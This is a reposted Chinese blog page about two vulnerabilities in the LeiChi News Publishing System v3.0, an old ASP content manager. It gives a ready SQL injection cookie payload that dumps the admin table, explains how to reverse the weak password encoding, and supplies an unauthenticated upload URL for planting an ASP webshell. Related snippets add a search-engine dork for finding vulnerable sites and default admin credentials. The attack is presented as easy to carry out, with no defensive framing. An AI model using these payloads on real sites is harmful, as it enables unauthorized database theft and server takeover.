雷驰新闻发布管理系统v3.0漏洞很简单

最新推荐文章于 2024-09-29 23:15:26 发布
最新推荐文章于 2024-09-29 23:15:26 发布
阅读量2k 收藏
点赞数
文章标签: 加密 cookies 娱乐
<script src="http://www.hookbase.com/design/GetHits.asp?ArticleID=15586" language="javascript" type="text/javascript"></script> 骇客基地 阅读:4 时间:2008-1-13 14:10:27 来源:www.hookbase.com
------------------------------------------------------------------
<script src="http://www.hookbase.com/ad/wz_ad1.js" language="javascript" style="display: none;" type="text/javascript"></script>
 
雷驰新闻发布管理系统v3.0漏洞很简单。
  我就看了两个最直接的漏洞。
转自:bct

第一个就是得到管理员的密码和用户名。。
在http://127.0.0.1/otype.asp?owen1=文体新闻
加上下面的一段COOKIES。。
owen2 =娱乐新闻&#39; and 1=2 union select 1,admin,3,4,5,6,7,8,password,10,11 from admin where 1&lt;2 and &#39;&#39;=&#39;
(注意要转换一下。。)直接得到管理员的用户名与密码
其密码简单加密了,第一位加1,第二位加2。。第5位加5
如果密码本来是aaaaa的话,那么加密出来就是bcdef
如果加密后的密码是fffff的话,那么原来的密码就是edcba

第二个漏洞,直接得到WEBSHELL
后门有一个上传图片,里面的有一段代码是这样的
actionType = trim(Request.QueryString("actionType"))
picName = trim(Request.QueryString("picName"))
…………
if actionType= "mod" then
remFileName = Right(picName,len(picName)-InstrRev(picName,"/"))
else
…………
end if
file.SaveAs Server.mappath(formPath&remFileName)

提交地址改成
/admin/uploadPic.inc.asp?upload_code=ok&editImageNum=1&actionType=mod&picName=123.asp&editRemNum=123123123
就可以直接上传一个马了。。。

第二个漏洞问题很严重,因为uploadPic.inc.asp这个文件竟然没有验证管理员是否登陆。。。。

意思就是说,第一步都可以省略了来搞,汗~~~~

我主要就是想说明的问题就是
这个程序的漏洞太大了,而且利用太简单了而已。。。。
 
艾伦之家
关注
新闻推荐系统】(task1)系统搭建基本流程
发现问题,并解决问题,批判性思维
12-13 3661
学习总结 sparrow电影推荐系统和我们本次要搭建的新闻推荐系统类似: 首先是离线处理部分: 获取数据:爬取数据后画像处理。用户画像和物品画像,物料存入MongoDB中的SinaNews数据库中;MongoDB中的用户画像,来自mysql中的用户注册表和用户日志数据(如阅读量、点赞数、收藏数等)。这里我们用MongoDB是因为其文档类似于JSON对象,增删字段非常方便。处理完的物料会存入redis中(直接从MongoDB拉去会比较卡),前端展示。 PS:这里为了方便搭建,数据并不是实时在线获得,但是每晚
asp雷驰新闻系统源码
10-13
asp雷驰新闻系统 雷驰新闻系统 asp
雷驰新闻系统 v3.0.rar
07-05
1,新闻栏目二级分类,随意修改,管理员分级管理 2,采用强大的HTML编辑器输入新闻文章 3,不存在任何新闻内容不能分段,不出空格的问题 4,可以直接复制任何图文信息,输出和原来格式一模一样 5,前台使用JS随意调用新闻 6,支持图片新闻,无组件上传图片到数据库,前台JS调用 v3.0更新: 1、修复sql注入 2、解决'or'='or' 3、增加全部新闻 4、合并友情连接数据库 v2.0版新增功能: 1.加入防注入 2.完善程序所在不同目录造成的首页调用后点击报错 3.加入友情连接,link/admin.asp登陆,密码为admin,link/db_inc.asp这个页面可以控制修改密码! 4.加入相关评论 后台管理登陆文件:admin/adminlogin.asp 后台管理用户名和密码都是admin
雷池新闻发布系统uploadPic.asp漏洞
08-25 4972
1.在Google搜关键字:inurl:leichinews2.找到以下网址,如:http://www.13lang.com/leichinews/onews.asp?id=713.我们把leichinews/后面的改成admin/uploadPic.asp?actionType=mod&picName=13lang.asp 提交4.把我们的小马改成.gif后缀上传,如13lang.g
雷驰新闻发布管理系统 v3.0
03-25
最新3.0版新增功能:   1、修复sql注入 2、解决'or'='or' 3、增加全部新闻 4、合并友情连接数据库 后台管理登陆文件:admin/adminlogin.asp 后台管理用户名和密码都是admin
雷驰系统总结
07-17 597
注:本文主要总结雷池三个版本的几个漏洞简单说下拿shell,善于总结进步才快。呵呵,本文献给和我一样的小菜,高手掠过!初学asp,有错请提出~谢谢!一、’or’=’or’漏洞1.漏洞分析漏洞文件当然在后台验证文件上,/admin/CHKLOGIN.ASP中,见代码4-7行:dim rsadmin1=request("admin") ‘没有任何过滤password1=request("p...
雷驰新闻发布管理系统v3.0漏洞简单 (转)
花开的声音(Mr’yan的技术集)
10-16 1942
第一个就是得到管理员的密码和用户名。。 在http://127.0.0.1/otype.asp?owen1=文体新闻 加上下面的一段COOKIES。。 owen2=娱乐新闻' and 1=2 union select 1,admin,3,4,5,6,7,8,password,10,11 from admin where 1<2 and ''='(注
雷池加密解密程序delphi版
07-31
可以很轻松的解开雷池加密的字符串,界面可视化,美观实用,欢迎下载 雷驰新闻加密解密算法 Delphi版 算法可以用户雷驰新闻系统,当然我也不一定只有雷池哦,因为这个算法在我黑的站中都发现很多改版的新闻系统加密方式都一样。但记不起来哪些了,多去down点回来看也行还有新发现。 MD5:00df3425e723e4ebe03e0a5f02c033e0 CraLeichi.exe
leichinewsv3.0.rar
03-21
asp码源,版本较老,可用Windows2003搭建环境,用以web安全测试
米安代码审计 06 PHPYUN V3.0 任意文件上传漏洞
kevinhanser
07-24 613
本文记录 PHP 代码审计的学习过程,教程为暗月 2015 版的 PHP 代码审计课程 PHP 代码审计博客目录 1. 简介 web环境: phpstudy apache+php5.2 程序版本:phpyun3.0 &amp;nbsp;2013-11-02 2. 测试 首先注册一个会员 然后访问 http://192.168.171.128/member/inde...
雷池3.0 漏洞扫描
weixin_46580614的博客
08-25 1084
雷池3.0 漏洞扫描 实验环境: 靶机:win8 192.168.19.131 攻击机 :win10 192.168.19.1 漏洞复现 方式一 sqlmap 绕过waf 首先下win8服务器上搭建雷池3.0的服务 win8使用net模式 win10重启一下vm8网卡 通过浏览器就可以访问 雷池的网站 随便点一个一个服务 可以看到**?id=46** 所以习惯进行sql注入 ?id=1 ?id=1' 可以看出 用‘进行注入 被waf拦截 被后台记录 所以换个方式 打开awvs对该网站进
新闻管理系统——登录页面
L1099488419的专栏
02-16 5092
上面是一个简单的登录页面,写在main.xml里的,然后里面的账号,密码等文字为了以后方便找,我写在了string.xml里。这只是俺想做这个项目的一部分,以后有可能还会更改,不过现在我只做了登录页面,就先上传这个,嘿嘿。下面是代码,嘿嘿: string.xml里:     Hello World, NewsManangeActivity!     NewsManange
漏洞新闻以及其他
Fenng's Blog
07-18 170
&#13; 今天看到了一则新闻《谁是下一个Google:中国IT公司IPO热点分析》,其中说到阿里巴巴的一段是这样的: 从资本市场角度来看,1999年,高盛牵头进行的银团投资,软银注入成长基金至今也有5年,2004年2月,日本软银牵头,包括富达、TDF和Granite Global Ventures在内的四家风险投资公司再度注资8200万美元,基本上市框架已经成行。阿里巴巴并...
大屏娱乐体验新标杆:海信发布全新一代AI电视
趣味科技v
09-29 550
在金秋送爽的9月29日,海信以一场盛大的“BIG PLAN百吋风暴”秋季新品发布会,正式揭开了AI电视新时代的序幕。作为本场发布会上最耀眼的明星,海信AI电视E7N系列凭借无与伦比的AI画质技术和极致性能,引领大屏娱乐体验迈入全新境界,堪称游戏玩家与影视发烧友的梦幻之选。画质与性能的双重飞跃对于追求极致游戏体验的玩家而言,海信AI电视E7N无疑是梦想中的“神装”。该系列电视搭载了海信自研的ULED...
CPA 税法 马兆瑞 基础班 第11章 偶然所得应纳税额的计算 税收优惠.pdf
最新发布
10-10
CPA 税法 马兆瑞 基础班 第11章 偶然所得应纳税额的计算 税收优惠.pdf
python入门教程学习攻略总结 python就看这个章节总结
10-10
python入门 Python入门教程知识点 第一章:Python简介与环境搭建 1.1 章节知识点目录 Python的历史与特点 Python的版本选择(Python 2 vs Python 3) Python开发环境搭建(IDE介绍:PyCharm, VSCode, Jupyter Notebook) 第一个Python程序:Hello, World! 第二章:Python基础语法 2.1 章节知识点目录 变量与数据类型(整数、浮点数、字符串、布尔值) 运算符与表达式 条件语句(if...else) 循环结构(for循环,while循环) 函数定义与调用 第三章:数据结构 3.1 章节知识点目录 列表(List)与元组(Tuple) 字典(Dictionary)与集合(Set) 字符串操作 列表推导式与生成器表达式 第四章:面向对象编程(OOP) 4.1 章节知识点目录 类与对象的概念 类的定义与实例化 属性与方法 继承与多态 封装与抽象 4.2 重点内容 类是创建对象的蓝图,包含属性和方法。 对象是根据类实例化得到的实体,具有自己的状态和行为。 继承允许新类继承父类
SpringBoot+Vue电影订票系统答辩PPT.pptx
10-10
计算机毕业设计答辩PPT
SpringBoot+Vue川剧科普平台答辩PPT.pptx
10-10
计算机毕业设计答辩PPT
OpenCV图像锐化的实现及原理介绍(包含详细的完整的程序和数据)
10-10
内容概要:本文章深入解析了使用OpenCV进行图像锐化的方法,特别是通过邻居访问运用拉普拉斯算子提高图像的边缘清晰度的技术原理。文中不仅介绍了锐化算法的工作方式,还展示了从环境搭建到编码实现再到最终成果展现的具体流程,并讨论了几种常用的边界处理手段及其在cv::filter2D函数中的应用实例。同时提到了几种潜在的研究改善方向及注意事项。 适用人群:对计算机视觉技术感兴趣的研发人员、软件工程师或相关领域的研究学者。 使用场景及目标:旨在教授如何运用OpenCV完成图像锐化,以增强图像轮廓与细节特征提取效率;帮助开发者熟悉滤波技术的实际操作方法,并理解背后的概念与设计思想。 其他说明:此资源强调动手能力,在提供理论的同时,也提供了具体执行指导,适合作为开放项目教程或实验练习的基础材料。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值